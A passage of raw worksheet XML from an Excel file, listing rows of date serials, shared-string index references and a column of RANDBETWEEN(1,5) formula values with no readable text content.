        <v>2</v>
      </c>
    </row>
    <row r="22383" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A22383" s="1">
        <v>43047.510659722226</v>
      </c>
      <c r="C22383" t="s">
        <v>10</v>
      </c>
      <c r="D22383" t="s">
        <v>232</v>
      </c>
      <c r="E22383" s="2" t="s">
        <v>20208</v>
      </c>
      <c r="F22383">
        <f t="shared" ca="1" si="349"/>
        <v>3</v>
      </c>
    </row>
    <row r="22384" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A22384" s="1">
        <v>43047.50545138889</v>
      </c>
      <c r="C22384" t="s">
        <v>173</v>
      </c>
      <c r="E22384" s="2" t="s">
        <v>20209</v>
      </c>
      <c r="F22384">
        <f t="shared" ca="1" si="349"/>
        <v>1</v>
      </c>
    </row>
    <row r="22385" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22385" s="1">
        <v>43047.503692129627</v>
      </c>
      <c r="C22385" t="s">
        <v>10</v>
      </c>
      <c r="D22385" t="s">
        <v>107</v>
      </c>
      <c r="E22385" t="s">
        <v>20210</v>
      </c>
      <c r="F22385">
        <f t="shared" ca="1" si="349"/>
        <v>1</v>
      </c>
    </row>
    <row r="22386" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A22386" s="1">
        <v>43047.498344907406</v>
      </c>
      <c r="C22386" t="s">
        <v>10</v>
      </c>
      <c r="D22386" t="s">
        <v>94</v>
      </c>
      <c r="E22386" s="2" t="s">
        <v>20211</v>
      </c>
      <c r="F22386">
        <f t="shared" ca="1" si="349"/>
        <v>4</v>
      </c>
    </row>
    <row r="22387" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22387" s="1">
        <v>43047.497708333336</v>
      </c>
      <c r="C22387" t="s">
        <v>10</v>
      </c>
      <c r="D22387" t="s">
        <v>33</v>
      </c>
      <c r="E22387" t="s">
        <v>20212</v>
      </c>
      <c r="F22387">
        <f t="shared" ca="1" si="349"/>
        <v>3</v>
      </c>
    </row>
    <row r="22388" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A22388" s="1">
        <v>43047.49622685185</v>
      </c>
      <c r="C22388" t="s">
        <v>6</v>
      </c>
      <c r="D22388" t="s">
        <v>25</v>
      </c>
      <c r="E22388" s="2" t="s">
        <v>20213</v>
      </c>
      <c r="F22388">
        <f t="shared" ca="1" si="349"/>
        <v>4</v>
      </c>
    </row>
    <row r="22389" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22389" s="1">
        <v>43047.473541666666</v>
      </c>
      <c r="C22389" t="s">
        <v>6</v>
      </c>
      <c r="D22389" t="s">
        <v>114</v>
      </c>
      <c r="E22389" t="s">
        <v>20214</v>
      </c>
      <c r="F22389">
        <f t="shared" ca="1" si="349"/>
        <v>2</v>
      </c>
    </row>
    <row r="22390" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A22390" s="1">
        <v>43047.44568287037</v>
      </c>
      <c r="C22390" t="s">
        <v>6</v>
      </c>
      <c r="D22390" t="s">
        <v>25</v>
      </c>
      <c r="E22390" s="2" t="s">
        <v>20215</v>
      </c>
      <c r="F22390">
        <f t="shared" ca="1" si="349"/>
        <v>3</v>
      </c>
    </row>
    <row r="22391" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22391" s="1">
        <v>43047.424386574072</v>
      </c>
      <c r="C22391" t="s">
        <v>10</v>
      </c>
      <c r="D22391" t="s">
        <v>14</v>
      </c>
      <c r="E22391" t="s">
        <v>20216</v>
      </c>
      <c r="F22391">
        <f t="shared" ca="1" si="349"/>
        <v>5</v>
      </c>
    </row>
    <row r="22392" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22392" s="1">
        <v>43047.424050925925</v>
      </c>
      <c r="C22392" t="s">
        <v>10</v>
      </c>
      <c r="D22392" t="s">
        <v>14</v>
      </c>
      <c r="E22392" t="s">
        <v>20216</v>
      </c>
      <c r="F22392">
        <f t="shared" ca="1" si="349"/>
        <v>2</v>
      </c>
    </row>
    <row r="22393" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22393" s="1">
        <v>43047.411793981482</v>
      </c>
      <c r="C22393" t="s">
        <v>16</v>
      </c>
      <c r="E22393" t="s">
        <v>20217</v>
      </c>
      <c r="F22393">
        <f t="shared" ca="1" si="349"/>
        <v>3</v>
      </c>
    </row>
    <row r="22394" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22394" s="1">
        <v>43047.393182870372</v>
      </c>
      <c r="C22394" t="s">
        <v>124</v>
      </c>
      <c r="E22394" t="s">
        <v>20218</v>
      </c>
      <c r="F22394">
        <f t="shared" ca="1" si="349"/>
        <v>4</v>
      </c>
    </row>
    <row r="22395" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A22395" s="1">
        <v>43047.377997685187</v>
      </c>
      <c r="C22395" t="s">
        <v>535</v>
      </c>
      <c r="E22395" s="2" t="s">
        <v>20219</v>
      </c>
      <c r="F22395">
        <f t="shared" ca="1" si="349"/>
        <v>3</v>
      </c>
    </row>
    <row r="22396" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A22396" s="1">
        <v>43047.36347222222</v>
      </c>
      <c r="C22396" t="s">
        <v>48</v>
      </c>
      <c r="E22396" s="2" t="s">
        <v>20220</v>
      </c>
      <c r="F22396">
        <f t="shared" ca="1" si="349"/>
        <v>4</v>
      </c>
    </row>
    <row r="22397" spans="1:6" ht="270" x14ac:dyDescent="0.25">
      <c r="A22397" s="1">
        <v>43047.353217592594</v>
      </c>
      <c r="C22397" t="s">
        <v>10</v>
      </c>
      <c r="D22397" t="s">
        <v>6</v>
      </c>
      <c r="E22397" s="2" t="s">
        <v>15872</v>
      </c>
      <c r="F22397">
        <f t="shared" ca="1" si="349"/>
        <v>4</v>
      </c>
    </row>
    <row r="22398" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A22398" s="1">
        <v>43047.343819444446</v>
      </c>
      <c r="C22398" t="s">
        <v>139</v>
      </c>
      <c r="D22398" t="s">
        <v>89</v>
      </c>
      <c r="E22398" s="2" t="s">
        <v>20221</v>
      </c>
      <c r="F22398">
        <f t="shared" ca="1" si="349"/>
        <v>1</v>
      </c>
    </row>
    <row r="22399" spans="1:6" ht="225" x14ac:dyDescent="0.25">
      <c r="A22399" s="1">
        <v>43047.331493055557</v>
      </c>
      <c r="C22399" t="s">
        <v>1199</v>
      </c>
      <c r="D22399" t="s">
        <v>86</v>
      </c>
      <c r="E22399" s="2" t="s">
        <v>20222</v>
      </c>
      <c r="F22399">
        <f t="shared" ca="1" si="349"/>
        <v>1</v>
      </c>
    </row>
    <row r="22400" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A22400" s="1">
        <v>43047.288206018522</v>
      </c>
      <c r="C22400" t="s">
        <v>71</v>
      </c>
      <c r="D22400" t="s">
        <v>312</v>
      </c>
      <c r="E22400" s="2" t="s">
        <v>20223</v>
      </c>
      <c r="F22400">
        <f t="shared" ca="1" si="349"/>
        <v>2</v>
      </c>
    </row>
    <row r="22401" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22401" s="1">
        <v>43047.228506944448</v>
      </c>
      <c r="C22401" t="s">
        <v>173</v>
      </c>
      <c r="E22401" t="s">
        <v>20224</v>
      </c>
      <c r="F22401">
        <f t="shared" ca="1" si="349"/>
        <v>1</v>
      </c>
    </row>
    <row r="22402" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A22402" s="1">
        <v>43047.226574074077</v>
      </c>
      <c r="C22402" t="s">
        <v>10</v>
      </c>
      <c r="D22402" t="s">
        <v>6</v>
      </c>
      <c r="E22402" s="2" t="s">
        <v>20225</v>
      </c>
      <c r="F22402">
        <f t="shared" ref="F22402:F22465" ca="1" si="350">RANDBETWEEN(1,5)</f>
        <v>3</v>
      </c>
    </row>
    <row r="22403" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22403" s="1">
        <v>43047.207465277781</v>
      </c>
      <c r="C22403" t="s">
        <v>48</v>
      </c>
      <c r="E22403" t="s">
        <v>20226</v>
      </c>
      <c r="F22403">
        <f t="shared" ca="1" si="350"/>
        <v>4</v>
      </c>
    </row>
    <row r="22404" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22404" s="1">
        <v>43047.188935185186</v>
      </c>
      <c r="C22404" t="s">
        <v>41</v>
      </c>
      <c r="E22404" t="s">
        <v>1446</v>
      </c>
      <c r="F22404">
        <f t="shared" ca="1" si="350"/>
        <v>3</v>
      </c>
    </row>
    <row r="22405" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22405" s="1">
        <v>43047.167638888888</v>
      </c>
      <c r="C22405" t="s">
        <v>1189</v>
      </c>
      <c r="D22405" t="s">
        <v>480</v>
      </c>
      <c r="E22405" t="s">
        <v>20227</v>
      </c>
      <c r="F22405">
        <f t="shared" ca="1" si="350"/>
        <v>3</v>
      </c>
    </row>
    <row r="22406" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A22406" s="1">
        <v>43047.15865740741</v>
      </c>
      <c r="C22406" t="s">
        <v>8872</v>
      </c>
      <c r="D22406" t="s">
        <v>312</v>
      </c>
      <c r="E22406" s="2" t="s">
        <v>20228</v>
      </c>
      <c r="F22406">
        <f t="shared" ca="1" si="350"/>
        <v>2</v>
      </c>
    </row>
    <row r="22407" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22407" s="1">
        <v>43047.113287037035</v>
      </c>
      <c r="C22407" t="s">
        <v>253</v>
      </c>
      <c r="E22407" t="s">
        <v>20229</v>
      </c>
      <c r="F22407">
        <f t="shared" ca="1" si="350"/>
        <v>3</v>
      </c>
    </row>
    <row r="22408" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22408" s="1">
        <v>43047.106990740744</v>
      </c>
      <c r="C22408" t="s">
        <v>140</v>
      </c>
      <c r="D22408" t="s">
        <v>197</v>
      </c>
      <c r="E22408" t="s">
        <v>20230</v>
      </c>
      <c r="F22408">
        <f t="shared" ca="1" si="350"/>
        <v>3</v>
      </c>
    </row>
    <row r="22409" spans="1:6" ht="225" x14ac:dyDescent="0.25">
      <c r="A22409" s="1">
        <v>43047.083148148151</v>
      </c>
      <c r="C22409" t="s">
        <v>41</v>
      </c>
      <c r="E22409" s="2" t="s">
        <v>20231</v>
      </c>
      <c r="F22409">
        <f t="shared" ca="1" si="350"/>
        <v>4</v>
      </c>
    </row>
    <row r="22410" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22410" s="1">
        <v>43047.061736111114</v>
      </c>
      <c r="C22410" t="s">
        <v>140</v>
      </c>
      <c r="D22410" t="s">
        <v>141</v>
      </c>
      <c r="E22410" t="s">
        <v>20232</v>
      </c>
      <c r="F22410">
        <f t="shared" ca="1" si="350"/>
        <v>1</v>
      </c>
    </row>
    <row r="22411" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22411" s="1">
        <v>43047.008888888886</v>
      </c>
      <c r="C22411" t="s">
        <v>10</v>
      </c>
      <c r="D22411" t="s">
        <v>6</v>
      </c>
      <c r="E22411" t="s">
        <v>20233</v>
      </c>
      <c r="F22411">
        <f t="shared" ca="1" si="350"/>
        <v>5</v>
      </c>
    </row>
    <row r="22412" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22412" s="1">
        <v>43047.007870370369</v>
      </c>
      <c r="C22412" t="s">
        <v>41</v>
      </c>
      <c r="E22412" t="s">
        <v>20234</v>
      </c>
      <c r="F22412">
        <f t="shared" ca="1" si="350"/>
        <v>1</v>
      </c>
    </row>
    <row r="22413" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22413" s="1">
        <v>43047.000601851854</v>
      </c>
      <c r="C22413" t="s">
        <v>318</v>
      </c>
      <c r="E22413" t="s">
        <v>20235</v>
      </c>
      <c r="F22413">
        <f t="shared" ca="1" si="350"/>
        <v>4</v>
      </c>
    </row>
    <row r="22414" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A22414" s="1">
        <v>43046.945590277777</v>
      </c>
      <c r="C22414" t="s">
        <v>144</v>
      </c>
      <c r="E22414" s="2" t="s">
        <v>20236</v>
      </c>
      <c r="F22414">
        <f t="shared" ca="1" si="350"/>
        <v>4</v>
      </c>
    </row>
    <row r="22415" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22415" s="1">
        <v>43046.758634259262</v>
      </c>
      <c r="C22415" t="s">
        <v>10</v>
      </c>
      <c r="D22415" t="s">
        <v>381</v>
      </c>
      <c r="E22415" t="s">
        <v>20237</v>
      </c>
      <c r="F22415">
        <f t="shared" ca="1" si="350"/>
        <v>2</v>
      </c>
    </row>
    <row r="22416" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22416" s="1">
        <v>43046.746851851851</v>
      </c>
      <c r="C22416" t="s">
        <v>10</v>
      </c>
      <c r="D22416" t="s">
        <v>381</v>
      </c>
      <c r="E22416" t="s">
        <v>20238</v>
      </c>
      <c r="F22416">
        <f t="shared" ca="1" si="350"/>
        <v>3</v>
      </c>
    </row>
    <row r="22417" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22417" s="1">
        <v>43046.744027777779</v>
      </c>
      <c r="C22417" t="s">
        <v>10</v>
      </c>
      <c r="D22417" t="s">
        <v>151</v>
      </c>
      <c r="E22417" t="s">
        <v>20239</v>
      </c>
      <c r="F22417">
        <f t="shared" ca="1" si="350"/>
        <v>5</v>
      </c>
    </row>
    <row r="22418" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22418" s="1">
        <v>43046.736250000002</v>
      </c>
      <c r="C22418" t="s">
        <v>10</v>
      </c>
      <c r="D22418" t="s">
        <v>94</v>
      </c>
      <c r="E22418" t="s">
        <v>20240</v>
      </c>
      <c r="F22418">
        <f t="shared" ca="1" si="350"/>
        <v>1</v>
      </c>
    </row>
    <row r="22419" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A22419" s="1">
        <v>43046.653182870374</v>
      </c>
      <c r="C22419" t="s">
        <v>10</v>
      </c>
      <c r="D22419" t="s">
        <v>86</v>
      </c>
      <c r="E22419" s="2" t="s">
        <v>20241</v>
      </c>
      <c r="F22419">
        <f t="shared" ca="1" si="350"/>
        <v>5</v>
      </c>
    </row>
    <row r="22420" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A22420" s="1">
        <v>43046.649722222224</v>
      </c>
      <c r="C22420" t="s">
        <v>10</v>
      </c>
      <c r="D22420" t="s">
        <v>92</v>
      </c>
      <c r="E22420" s="2" t="s">
        <v>20242</v>
      </c>
      <c r="F22420">
        <f t="shared" ca="1" si="350"/>
        <v>5</v>
      </c>
    </row>
    <row r="22421" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22421" s="1">
        <v>43046.646469907406</v>
      </c>
      <c r="C22421" t="s">
        <v>10</v>
      </c>
      <c r="D22421" t="s">
        <v>381</v>
      </c>
      <c r="E22421" t="s">
        <v>20243</v>
      </c>
      <c r="F22421">
        <f t="shared" ca="1" si="350"/>
        <v>4</v>
      </c>
    </row>
    <row r="22422" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A22422" s="1">
        <v>43046.641956018517</v>
      </c>
      <c r="C22422" t="s">
        <v>10</v>
      </c>
      <c r="D22422" t="s">
        <v>263</v>
      </c>
      <c r="E22422" s="2" t="s">
        <v>20244</v>
      </c>
      <c r="F22422">
        <f t="shared" ca="1" si="350"/>
        <v>4</v>
      </c>
    </row>
    <row r="22423" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22423" s="1">
        <v>43046.632013888891</v>
      </c>
      <c r="C22423" t="s">
        <v>10</v>
      </c>
      <c r="D22423" t="s">
        <v>23</v>
      </c>
      <c r="E22423" t="s">
        <v>20245</v>
      </c>
      <c r="F22423">
        <f t="shared" ca="1" si="350"/>
        <v>2</v>
      </c>
    </row>
    <row r="22424" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22424" s="1">
        <v>43046.629351851851</v>
      </c>
      <c r="C22424" t="s">
        <v>10</v>
      </c>
      <c r="D22424" t="s">
        <v>46</v>
      </c>
      <c r="E22424" t="s">
        <v>20246</v>
      </c>
      <c r="F22424">
        <f t="shared" ca="1" si="350"/>
        <v>3</v>
      </c>
    </row>
    <row r="22425" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22425" s="1">
        <v>43046.627175925925</v>
      </c>
      <c r="C22425" t="s">
        <v>10</v>
      </c>
      <c r="D22425" t="s">
        <v>80</v>
      </c>
      <c r="E22425" t="s">
        <v>20247</v>
      </c>
      <c r="F22425">
        <f t="shared" ca="1" si="350"/>
        <v>3</v>
      </c>
    </row>
    <row r="22426" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22426" s="1">
        <v>43046.614166666666</v>
      </c>
      <c r="C22426" t="s">
        <v>10</v>
      </c>
      <c r="D22426" t="s">
        <v>17</v>
      </c>
      <c r="E22426" t="s">
        <v>20248</v>
      </c>
      <c r="F22426">
        <f t="shared" ca="1" si="350"/>
        <v>5</v>
      </c>
    </row>
    <row r="22427" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22427" s="1">
        <v>43046.59778935185</v>
      </c>
      <c r="C22427" t="s">
        <v>10</v>
      </c>
      <c r="D22427" t="s">
        <v>86</v>
      </c>
      <c r="E22427" t="s">
        <v>20249</v>
      </c>
      <c r="F22427">
        <f t="shared" ca="1" si="350"/>
        <v>4</v>
      </c>
    </row>
    <row r="22428" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22428" s="1">
        <v>43046.591886574075</v>
      </c>
      <c r="C22428" t="s">
        <v>10</v>
      </c>
      <c r="D22428" t="s">
        <v>23</v>
      </c>
      <c r="E22428" t="s">
        <v>20250</v>
      </c>
      <c r="F22428">
        <f t="shared" ca="1" si="350"/>
        <v>4</v>
      </c>
    </row>
    <row r="22429" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22429" s="1">
        <v>43046.590208333335</v>
      </c>
      <c r="C22429" t="s">
        <v>5162</v>
      </c>
      <c r="D22429" t="s">
        <v>33</v>
      </c>
      <c r="E22429" t="s">
        <v>20251</v>
      </c>
      <c r="F22429">
        <f t="shared" ca="1" si="350"/>
        <v>5</v>
      </c>
    </row>
    <row r="22430" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22430" s="1">
        <v>43046.570752314816</v>
      </c>
      <c r="C22430" t="s">
        <v>124</v>
      </c>
      <c r="D22430" t="s">
        <v>67</v>
      </c>
      <c r="E22430" t="s">
        <v>20252</v>
      </c>
      <c r="F22430">
        <f t="shared" ca="1" si="350"/>
        <v>2</v>
      </c>
    </row>
    <row r="22431" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22431" s="1">
        <v>43046.553287037037</v>
      </c>
      <c r="C22431" t="s">
        <v>6</v>
      </c>
      <c r="D22431" t="s">
        <v>25</v>
      </c>
      <c r="E22431" t="s">
        <v>20253</v>
      </c>
      <c r="F22431">
        <f t="shared" ca="1" si="350"/>
        <v>2</v>
      </c>
    </row>
    <row r="22432" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22432" s="1">
        <v>43046.553287037037</v>
      </c>
      <c r="C22432" t="s">
        <v>6</v>
      </c>
      <c r="D22432" t="s">
        <v>25</v>
      </c>
      <c r="E22432" t="s">
        <v>20253</v>
      </c>
      <c r="F22432">
        <f t="shared" ca="1" si="350"/>
        <v>4</v>
      </c>
    </row>
    <row r="22433" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22433" s="1">
        <v>43046.55327546296</v>
      </c>
      <c r="C22433" t="s">
        <v>6</v>
      </c>
      <c r="D22433" t="s">
        <v>25</v>
      </c>
      <c r="E22433" t="s">
        <v>20253</v>
      </c>
      <c r="F22433">
        <f t="shared" ca="1" si="350"/>
        <v>1</v>
      </c>
    </row>
    <row r="22434" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22434" s="1">
        <v>43046.55327546296</v>
      </c>
      <c r="C22434" t="s">
        <v>6</v>
      </c>
      <c r="D22434" t="s">
        <v>25</v>
      </c>
      <c r="E22434" t="s">
        <v>20253</v>
      </c>
      <c r="F22434">
        <f t="shared" ca="1" si="350"/>
        <v>4</v>
      </c>
    </row>
    <row r="22435" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22435" s="1">
        <v>43046.553263888891</v>
      </c>
      <c r="C22435" t="s">
        <v>6</v>
      </c>
      <c r="D22435" t="s">
        <v>25</v>
      </c>
      <c r="E22435" t="s">
        <v>20253</v>
      </c>
      <c r="F22435">
        <f t="shared" ca="1" si="350"/>
        <v>5</v>
      </c>
    </row>
    <row r="22436" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22436" s="1">
        <v>43046.553217592591</v>
      </c>
      <c r="C22436" t="s">
        <v>6</v>
      </c>
      <c r="D22436" t="s">
        <v>25</v>
      </c>
      <c r="E22436" t="s">
        <v>20253</v>
      </c>
      <c r="F22436">
        <f t="shared" ca="1" si="350"/>
        <v>3</v>
      </c>
    </row>
    <row r="22437" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A22437" s="1">
        <v>43046.53943287037</v>
      </c>
      <c r="C22437" t="s">
        <v>10</v>
      </c>
      <c r="D22437" t="s">
        <v>1036</v>
      </c>
      <c r="E22437" s="2" t="s">
        <v>20254</v>
      </c>
      <c r="F22437">
        <f t="shared" ca="1" si="350"/>
        <v>1</v>
      </c>
    </row>
    <row r="22438" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22438" s="1">
        <v>43046.525914351849</v>
      </c>
      <c r="C22438" t="s">
        <v>10</v>
      </c>
      <c r="D22438" t="s">
        <v>192</v>
      </c>
      <c r="E22438" t="s">
        <v>20255</v>
      </c>
      <c r="F22438">
        <f t="shared" ca="1" si="350"/>
        <v>2</v>
      </c>
    </row>
    <row r="22439" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22439" s="1">
        <v>43046.52306712963</v>
      </c>
      <c r="C22439" t="s">
        <v>559</v>
      </c>
      <c r="D22439" t="s">
        <v>374</v>
      </c>
      <c r="E22439" t="s">
        <v>16191</v>
      </c>
      <c r="F22439">
        <f t="shared" ca="1" si="350"/>
        <v>3</v>
      </c>
    </row>
    <row r="22440" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22440" s="1">
        <v>43046.521064814813</v>
      </c>
      <c r="C22440" t="s">
        <v>48</v>
      </c>
      <c r="E22440" t="s">
        <v>20256</v>
      </c>
      <c r="F22440">
        <f t="shared" ca="1" si="350"/>
        <v>3</v>
      </c>
    </row>
    <row r="22441" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22441" s="1">
        <v>43046.510717592595</v>
      </c>
      <c r="C22441" t="s">
        <v>10</v>
      </c>
      <c r="D22441" t="s">
        <v>52</v>
      </c>
      <c r="E22441" t="s">
        <v>20257</v>
      </c>
      <c r="F22441">
        <f t="shared" ca="1" si="350"/>
        <v>1</v>
      </c>
    </row>
    <row r="22442" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22442" s="1">
        <v>43046.480543981481</v>
      </c>
      <c r="C22442" t="s">
        <v>48</v>
      </c>
      <c r="E22442" t="s">
        <v>20258</v>
      </c>
      <c r="F22442">
        <f t="shared" ca="1" si="350"/>
        <v>2</v>
      </c>
    </row>
    <row r="22443" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A22443" s="1">
        <v>43046.474317129629</v>
      </c>
      <c r="C22443" t="s">
        <v>6</v>
      </c>
      <c r="D22443" t="s">
        <v>114</v>
      </c>
      <c r="E22443" s="2" t="s">
        <v>20259</v>
      </c>
      <c r="F22443">
        <f t="shared" ca="1" si="350"/>
        <v>4</v>
      </c>
    </row>
    <row r="22444" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A22444" s="1">
        <v>43046.472743055558</v>
      </c>
      <c r="C22444" t="s">
        <v>10</v>
      </c>
      <c r="D22444" t="s">
        <v>17</v>
      </c>
      <c r="E22444" s="2" t="s">
        <v>20260</v>
      </c>
      <c r="F22444">
        <f t="shared" ca="1" si="350"/>
        <v>5</v>
      </c>
    </row>
    <row r="22445" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A22445" s="1">
        <v>43046.472291666665</v>
      </c>
      <c r="C22445" t="s">
        <v>10</v>
      </c>
      <c r="D22445" t="s">
        <v>17</v>
      </c>
      <c r="E22445" s="2" t="s">
        <v>20260</v>
      </c>
      <c r="F22445">
        <f t="shared" ca="1" si="350"/>
        <v>4</v>
      </c>
    </row>
    <row r="22446" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22446" s="1">
        <v>43046.450601851851</v>
      </c>
      <c r="C22446" t="s">
        <v>10</v>
      </c>
      <c r="D22446" t="s">
        <v>89</v>
      </c>
      <c r="E22446" t="s">
        <v>20261</v>
      </c>
      <c r="F22446">
        <f t="shared" ca="1" si="350"/>
        <v>3</v>
      </c>
    </row>
    <row r="22447" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22447" s="1">
        <v>43046.444699074076</v>
      </c>
      <c r="C22447" t="s">
        <v>10</v>
      </c>
      <c r="D22447" t="s">
        <v>6</v>
      </c>
      <c r="E22447" t="s">
        <v>20262</v>
      </c>
      <c r="F22447">
        <f t="shared" ca="1" si="350"/>
        <v>2</v>
      </c>
    </row>
    <row r="22448" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22448" s="1">
        <v>43046.43246527778</v>
      </c>
      <c r="C22448" t="s">
        <v>71</v>
      </c>
      <c r="E22448" t="s">
        <v>20263</v>
      </c>
      <c r="F22448">
        <f t="shared" ca="1" si="350"/>
        <v>2</v>
      </c>
    </row>
    <row r="22449" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A22449" s="1">
        <v>43046.432002314818</v>
      </c>
      <c r="C22449" t="s">
        <v>6</v>
      </c>
      <c r="D22449" t="s">
        <v>25</v>
      </c>
      <c r="E22449" s="2" t="s">
        <v>20264</v>
      </c>
      <c r="F22449">
        <f t="shared" ca="1" si="350"/>
        <v>2</v>
      </c>
    </row>
    <row r="22450" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A22450" s="1">
        <v>43046.377303240741</v>
      </c>
      <c r="C22450" t="s">
        <v>6</v>
      </c>
      <c r="D22450" t="s">
        <v>114</v>
      </c>
      <c r="E22450" s="2" t="s">
        <v>20265</v>
      </c>
      <c r="F22450">
        <f t="shared" ca="1" si="350"/>
        <v>1</v>
      </c>
    </row>
    <row r="22451" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22451" s="1">
        <v>43046.355011574073</v>
      </c>
      <c r="C22451" t="s">
        <v>10</v>
      </c>
      <c r="D22451" t="s">
        <v>86</v>
      </c>
      <c r="E22451" t="s">
        <v>20266</v>
      </c>
      <c r="F22451">
        <f t="shared" ca="1" si="350"/>
        <v>3</v>
      </c>
    </row>
    <row r="22452" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A22452" s="1">
        <v>43046.308275462965</v>
      </c>
      <c r="C22452" t="s">
        <v>43</v>
      </c>
      <c r="E22452" s="2" t="s">
        <v>20267</v>
      </c>
      <c r="F22452">
        <f t="shared" ca="1" si="350"/>
        <v>1</v>
      </c>
    </row>
    <row r="22453" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A22453" s="1">
        <v>43046.25072916667</v>
      </c>
      <c r="C22453" t="s">
        <v>430</v>
      </c>
      <c r="E22453" s="2" t="s">
        <v>20268</v>
      </c>
      <c r="F22453">
        <f t="shared" ca="1" si="350"/>
        <v>4</v>
      </c>
    </row>
    <row r="22454" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A22454" s="1">
        <v>43046.248749999999</v>
      </c>
      <c r="C22454" t="s">
        <v>430</v>
      </c>
      <c r="E22454" s="2" t="s">
        <v>20268</v>
      </c>
      <c r="F22454">
        <f t="shared" ca="1" si="350"/>
        <v>4</v>
      </c>
    </row>
    <row r="22455" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A22455" s="1">
        <v>43046.247997685183</v>
      </c>
      <c r="C22455" t="s">
        <v>430</v>
      </c>
      <c r="E22455" s="2" t="s">
        <v>20268</v>
      </c>
      <c r="F22455">
        <f t="shared" ca="1" si="350"/>
        <v>1</v>
      </c>
    </row>
    <row r="22456" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22456" s="1">
        <v>43046.220497685186</v>
      </c>
      <c r="C22456" t="s">
        <v>41</v>
      </c>
      <c r="E22456" t="s">
        <v>20269</v>
      </c>
      <c r="F22456">
        <f t="shared" ca="1" si="350"/>
        <v>2</v>
      </c>
    </row>
    <row r="22457" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A22457" s="1">
        <v>43046.16207175926</v>
      </c>
      <c r="C22457" t="s">
        <v>10</v>
      </c>
      <c r="D22457" t="s">
        <v>667</v>
      </c>
      <c r="E22457" t="s">
        <v>20270</v>
      </c>
      <c r="F22457">
        <f t="shared" ca="1" si="350"/>
        <v>2</v>
      </c>
    </row>
    <row r="22458" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A22458" s="1">
        <v>43046.159814814811</v>
      </c>
      <c r="C22458" t="s">
        <v>48</v>
      </c>
      <c r="E22458" s="2" t="s">
        <v>20271</v>
      </c>
      <c r="F22458">
        <f t="shared" ca="1" si="350"/>
        <v>5</v>
      </c>
    </row>
    <row r="22459" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A22459" s="1">
        <v>43046.154791666668</v>
      </c>
      <c r="C22459" t="s">
        <v>71</v>
      </c>
      <c r="E22459" s="2" t="s">
        <v>20272</v>
      </c>
      <c r="F22459">
        <f t="shared" ca="1" si="350"/>
        <v>1</v>
      </c>
    </row>
